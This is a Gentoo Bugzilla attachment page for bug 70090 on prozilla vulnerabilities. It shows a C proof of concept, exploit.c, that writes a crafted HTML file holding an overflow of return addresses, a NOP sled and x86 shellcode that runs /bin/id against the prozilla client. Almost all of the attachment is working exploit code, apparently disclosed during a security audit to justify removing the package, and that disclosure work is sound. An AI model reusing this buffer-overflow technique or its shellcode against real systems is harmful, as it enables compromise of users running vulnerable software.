Go to:
Gentoo Home
Documentation
Forums
Lists
Bugs
Planet
Store
Wiki
Get Gentoo!
Gentoo's Bugzilla – Attachment 67521 Details for
Bug 70090
www-client/prozilla: multiple vulnerabilities -> Remove from tree
Home
|
New
–
[Ex]
|
Browse
|
Search
|
Privacy Policy
|
[?]
|
Reports
|
Requests
|
Help
|
New Account
|
Log In
[x]
|
Forgot Password
Login:
[x]
prozilla poc
exploit.c (text/plain), 1.25 KB, created by
Tavis Ormandy (RETIRED)
on 2005-09-02 16:49:14 UTC
(
hide
)
Description:
prozilla poc
Filename:
MIME Type:
Creator:
Tavis Ormandy (RETIRED)
Created:
2005-09-02 16:49:14 UTC
Size:
1.25 KB
patch
obsolete
>#include <stdio.h> >#include <string.h> >#include <stdlib.h> > >#define OVERFLOW (1<<10)+32 >#define SLEDSIZ (1<<10) >#define RETADDR 0x806977a+SLEDSIZ/2 >#define OUTPUT "AdvResults.asp" > >/* > * prozilla bug, found while auditing for gentoo bug #70090 > * -taviso@gentoo.org > */ > >/* execve() /bin/id */ >unsigned char shellcode[] = >"\x33\xc9\x83\xe9\xf5\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7e" >"\x02\xad\x8e\x83\xeb\xfc\xe2\xf4\x14\x09\xf5\x17\x2c\x64\xc5\xa3" >"\x1d\x8b\x4a\xe6\x51\x71\xc5\x8e\x16\x2d\xcf\xe7\x10\x8b\x4e\xdc" >"\x96\x0a\xad\x8e\x7e\x2d\xcf\xe7\x10\x2d\xc4\xea\x7e\x55\xfe\x07" >"\x9f\xcf\x2d\x8e"; > >int main(int argc, char **argv) >{ > unsigned char *buf; > void *ret = (void *) RETADDR; > FILE *exploit; > int i; > > exploit = fopen(OUTPUT, "w"); > fprintf(exploit, "<PRE><A HREF=>"); > > buf = malloc(OVERFLOW); > for (i = 0; buf + i < buf + OVERFLOW; i += sizeof(void *)) > memcpy(buf + i, &ret, sizeof(void *)); > fwrite(buf, OVERFLOW, 1, exploit); > fprintf(exploit, "</A><A HREF=></A><A HREF=></A></PRE>"); > buf = realloc(buf, SLEDSIZ + sizeof(shellcode)); > memset(buf, 0x90, SLEDSIZ); > memcpy(buf + SLEDSIZ, shellcode, sizeof(shellcode)); > fwrite(buf, SLEDSIZ + sizeof(shellcode), 1, exploit); > free(buf); > fprintf(stderr, "[*] %s created.\n", OUTPUT); > return 0; >}
You cannot view the attachment while viewing its details because your browser does not support IFRAMEs.
View the attachment on a separate page
.
View Attachment As Raw
Actions:
View
Attachments on
bug 70090
:
43329
|
49511
|
54684
| 67521